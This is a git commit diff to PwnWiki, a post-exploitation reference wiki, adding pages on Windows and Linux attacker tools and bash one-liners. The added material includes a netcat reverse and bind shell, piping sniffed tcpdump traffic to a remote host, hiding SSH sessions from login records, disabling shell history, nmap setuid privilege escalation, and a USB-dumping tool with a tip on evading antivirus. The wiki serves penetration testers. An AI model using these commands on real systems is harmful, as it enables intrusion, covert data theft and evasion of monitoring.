Fixing merge issues

WebBreacher · WebBreacher · commit ab073a6bb61c · 2014-02-06T20:21:55.000-05:00
diff --git a/bins/windows.md b/bins/windows.md
@@ -0,0 +1,7 @@
+# Useful Windows Binaries
+
+Useful Windows binary tools that can be used for post exploitation.
+
+|    Tool     | Description / Importance | Contributer |
+| ----------- | ------------------------ | ----------- |
+| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | 
diff --git a/bins/windows/index.md b/bins/windows/index.md
@@ -0,0 +1,7 @@
+# Useful Windows Binaries
+
+Useful Windows binary tools that can be used for post exploitation.
+
+|    Tool     | Description / Importance | Contributer |
+| ----------- | ------------------------ | ----------- |
+| usbdump.exe | Once executed, usbdump will run in the background and will dump the contents of all connected usb devices to a randomly numbered folder within the same directory as the usbdump.exe program. Useful for grabbing the contents of any usb devices later connected to a compromized machine. May have to modify it to bypass AV as its signature is in quite a few AV's. | Ian | 
diff --git a/index.md b/index.md
@@ -8,7 +8,7 @@
 
 ### Live Online Copy:
 
-You can find a copy of the project online at: http://PwnWiki.io
+You can find a copy of the project online at: http://pwnwiki.io
 
 ### Offline Use:
 
@@ -32,8 +32,7 @@ Curators:
   * [@tekwizz123](https://twitter.com/tekwizz123) [gimmick:TwitterFollow](@tekwizz123)
   * [@jakx_](https://twitter.com/jakx_) [gimmick:TwitterFollow](@jakx_)
   * [@TheColonial](https://twitter.com/TheColonial) [gimmick:TwitterFollow](@TheColonial)
-  * [@Wireghoul](https://twitter.com/Wireghoul) [gimmick:TwitterFollow](@Wireghoul)
-  
+  * [@Wireghoul](https://twitter.com/Wireghoul)  [gimmick:TwitterFollow](@Wireghoul)
 
 If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org)
 
diff --git a/index.md~ b/index.md~
@@ -0,0 +1,40 @@
+![](images/logo.jpg)
+
+[Image Generated Here](http://www.addletters.com/pictures/restaurant-sign-generator/4772466.htm#.UplRZ42PuuY)
+
+### PwnWiki.io is a collection TTPs (tools, tactics, and procedures) for what to do after access has been gained.
+
+- - - - - - 
+
+### Live Online Copy:
+
+You can find a copy of the project online at: http://pwnwiki.io
+
+### Offline Use:
+
+  1. Clone the repository or pull the archive ([download zip](https://github.com/pwnwiki/pwnwiki.github.io/archive/master.zip)) of the repo
+  2. Open index.html
+  3. Most modern browsers don't allow the access of local files from a locally loaded HTML file. On Windows you can use [Mongoose Tiny](http://cesanta.com/downloads.html) or [HFS](http://www.rejetto.com/hfs/) to host the files locally. On OSX and Linux `python -m SimpleHTTPServer` seems to work just fine.
+
+#### Referenced tools can be found here: https://github.com/mubix/post-exploitation (If they aren't built into the OS)
+
+- - - - - -
+#### Submitting Content
+We want/need your help! Please contribute to this project is via GitHub (https://github.com/pwnwiki/pwnwiki.github.io). That allows us to get your project-ready content incorporated into the wiki fast. 
+
+We realize that not everyone can/wants to submit content via GitHub and that's cool. If your go-to content is not up here and you don't want to spend the time becoming a Git Jedi, just visit our [Google Form](https://docs.google.com/forms/d/1N7-jRjnUXoz-UwB2h0du2IrskFJW6hBGs4YsTwvEncE/viewform). Due to the large amount of submissions and content, there may be a delay between your posting and us getting your content into the project. Thanks for your submissions and your patience! 
+
+- - - - - -
+Curators:
+
+  * [@mubix](https://twitter.com/mubix)
+  * [@WebBreacher](https://twitter.com/webbreacher)
+  * [@tekwizz123](https://twitter.com/tekwizz123)
+  * [@jakx_](https://twitter.com/jakx_)
+  * [@TheColonial](https://twitter.com/TheColonial)
+  * [@Wireghoul](https://twitter.com/Wireghoul)
+  
+
+If you would like to become a curator, please contact [mubix@hak5.org](mailto:mubix@hak5.org)
+
+[gimmick:ForkMeOnGitHub ({ color: 'red',  position: 'right' })](http://www.github.com/pwnwiki/pwnwiki.github.io/)
diff --git a/persistence/linux/general.md b/persistence/linux/general.md
@@ -0,0 +1,21 @@
+<!-- Code for collapse and expand -->
+<script type="text/javascript"> 
+$(document).ready(function() { 
+$('div.view').hide(); 
+$('div.slide').click(function() {
+$(this).next('div.view').slideToggle('fast'); 
+return false; 
+}); 
+}); 
+</script>
+
+# Linux General Persistence Commands
+
+Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt.
+
+###Run command as a daemon
+*Note this doesn't work with anything from apache. Runs like & but doesn't care if the parent process closes*
+```bash
+setsid *command*
+```
+
diff --git a/persistence/linux/general.md~ b/persistence/linux/general.md~
@@ -0,0 +1,21 @@
+<!-- Code for collapse and expand -->
+<script type="text/javascript"> 
+$(document).ready(function() { 
+$('div.view').hide(); 
+$('div.slide').click(function() {
+$(this).next('div.view').slideToggle('fast'); 
+return false; 
+}); 
+}); 
+</script>
+
+# Linux General Persistence Commands
+
+Commands to run to maintain persistence after you have exploited it and are usually executed from the context of the bash prompt.
+
+###Run command as a daemon
+*Note this doesn't work with anything from apache*
+```bash
+setsid *command*
+```
+
diff --git a/persistence/linux/index.md b/persistence/linux/index.md
@@ -0,0 +1,5 @@
+# Linux Persistence Commands
+
+Commands that help you maintain control over a compromised system.
+
+  * [General Commands](general.md) - Commands your could/should use to maintain your hold on the compromised system.
diff --git a/scripting/bash.md b/scripting/bash.md
@@ -89,12 +89,31 @@ grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
 tcpdump -w - | nc -v 8.8.8.8 9999
 ```
 
-**Recursively search for files within a directory**
+**Recursively search for text contained in files within a directory**
 ```bash
 zcat -rf ./* | grep "searchstring"
 ```
 
+**Recursively search for files with the specified word within them**
+*Submitted by cat on Google Fourms*
+```bash
+ls -a | find | grep -i "string"
+```
+
+**Netcat backdoor**
+*Does not work with most distro's default version of netcat (most do not define ENABLE_GAPING_SECURITY_HOLE which turns on -e)*
+```bash
+nc -e /bin/bash *remotecomputer* *port*
+OR
+nc -e /bin/bash -lp *port*
+```
+
+**View CPU Information**
+```bash
+cat /proc/cpuinfo
+```
+
 Credits
 -----------
-Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions
+Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)
 
diff --git a/scripting/bash.md~ b/scripting/bash.md~
@@ -0,0 +1,113 @@
+# Bash Commands for Post Exploitation
+
+One liners
+-----------
+
+**Resolve a list of hostnames to IP addresses**
+```bash
+awk < hostnames.txt '{ system("resolveip -s " $1) }'
+```
+
+**IIS 6.0 IP Disclosure**
+```bash
+curl -l -O -H "Host:" "example.com"
+```
+
+**Connect to SSL websites**
+```bash
+openssl s_client -connect example.com:443
+```
+
+**Convert base64 to text**
+```bash
+echo 'base64string' | base64 -d   (Use -D on OSX)
+```
+
+**Decode ASCII shellcode**
+```bash
+echo -e *shellcode hex string*   (may need to use -i to ignore bad chars)
+```
+
+**Enumerate DNS of Class C**
+```bash
+for ip in $(seq 1 254); do; host 10.1.1.$ip | grep "name pointer"; done
+```
+
+**SSH to box and hide from "who" and "lastlog"**
+```bash
+ssh andrew@10.1.1.1 -T /bin/bash
+```
+
+**Prevent terminal logging**
+```bash
+unset HISTFILE
+```
+
+**Add immutable attribute to a unix file**
+```bash
+chattr +i *file*
+```
+
+**SSH into host2 through host1**
+```bash
+ssh -o "proxycommand ssh -W host2 host1" host2
+```
+
+**Nmap setuid privesc**
+```bash
+nmap --script <(echo 'os.execute("/bin/sh")')
+nmap --interactive     (for older versions)
+```
+
+**Transfer files through SSH**
+```bash
+ssh test@10.1.1.1 "cat test.tar.gz" > test.tar.gz
+```
+
+**Internal port redirect for bypassing services**
+```bash 
+iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 4444
+```
+
+**Enable forwarding on the fly**
+```bash
+sysctl -w net.ipv4.ip_forward=1
+```
+
+**Kill with USR1 developer defined signal**
+```bash
+kill -USR1 <pid>
+```
+
+**Pull IP addresses from a file**
+```bash
+grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}'
+```
+
+**Sniff traffic with tcpdump and send to remote tcp socket**
+```bash
+tcpdump -w - | nc -v 8.8.8.8 9999
+```
+
+**Recursively search for text contained in files within a directory**
+```bash
+zcat -rf ./* | grep "searchstring"
+```
+
+**Recursively search for files with the specified word within them**
+*Submitted by cat on Google Fourms*
+```bash
+ls -a | find | grep -i "string"
+```
+
+**Netcat backdoor**
+```bash
+nc -e /bin/bash *remotecomputer* *port*
+OR
+nc -e /bin/bash -lp *port*
+```
+
+Credits
+-----------
+Credits to @TheAndrewBalls for posting some awsome one liners (the hidden SSH example and the DNS enumeration are both his contributions)
+
diff --git a/scripting/powershell.md b/scripting/powershell.md
diff --git a/scripting/powershell.md~ b/scripting/powershell.md~
